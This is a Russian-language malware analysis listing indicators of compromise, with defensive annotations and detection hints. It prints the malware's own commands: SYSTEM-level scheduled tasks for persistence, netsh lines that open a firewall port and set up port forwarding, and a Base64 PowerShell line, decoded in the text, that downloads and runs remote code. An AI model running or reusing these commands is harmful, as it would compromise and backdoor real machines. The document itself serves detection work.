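Техническая информация
Список содержит пути заданий планировщика (<SYSTEM32>\tasks\...), файлы в %WINDIR% и командные строки запускаемых процессов; длинные командные строки обрезаны («...»).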
- <SYSTEM32>\tasks\microsoft\windows\bluetool
- <SYSTEM32>\tasks\zwwnzyvr
- <SYSTEM32>\tasks\qsztsraw
- '<SYSTEM32>\netsh.exe' firewall add portopening tcp 65533 DNSd
- %WINDIR%\temp\svchost.exe
- %WINDIR%\temp\ipc.txt
- %WINDIR%\zwwnzyvr.exe
- '<SYSTEM32>\cmd.exe' /c echo JLAYtoQ >> %WINDIR%\temp\svchost.exe&echo "*" >%WINDIR%\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1... (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c echo JLAYtoQ >> %WINDIR%\temp\svchost.exe&echo "*" >%WINDIR%\temp\ipc.txt&netsh firewall add portopening tcp 65533 DNSd&netsh interface portproxy add v4tov4 listenport=65533 connectaddress=1...
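- '<SYSTEM32>\netsh.exe' interface portproxy add v4tov4 listenport=65533 connectaddress=1.1.1.1 connectport=53
  (правило portproxy перенаправляет локальный TCP-порт 65533 на 1.1.1.1:53; вместе с открытием порта 65533 в брандмауэре под именем «DNSd» это пригодный для проверки признак — текущие правила показывает netsh interface portproxy show all)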
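- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 50 /st 07:00:00 /tn "\Microsoft\windows\Bluetool" /tr "powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACk...
  (задание выполняется от имени SYSTEM каждые 50 минут; видимая часть аргумента -e — Base64 от строки в UTF-16LE — декодируется как «IEX (New-Object Net.WebClient)», то есть, по всей видимости, это загрузка и выполнение кода из сети; адрес загрузки в обрезанной строке не виден)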
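- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 10 /st 07:05:00 /tn ZWwnZYvr /tr "%WINDIR%\ZWwnZYvr.exe" /F
- '<SYSTEM32>\schtasks.exe' /create /ru system /sc MINUTE /mo 10 /st 07:00:00 /tn "\qszTSraW" /tr "%WINDIR%\sLGFt.exe" /F
  (оба задания запускаются от имени SYSTEM каждые 10 минут; файл %WINDIR%\sLGFt.exe в приведённом выше списке файлов отсутствует. Имена заданий и файлов выглядят случайно сгенерированными — при поиске, вероятно, надёжнее опираться на параметры задания (/ru system, запуск .exe из %WINDIR%), чем на конкретные имена.)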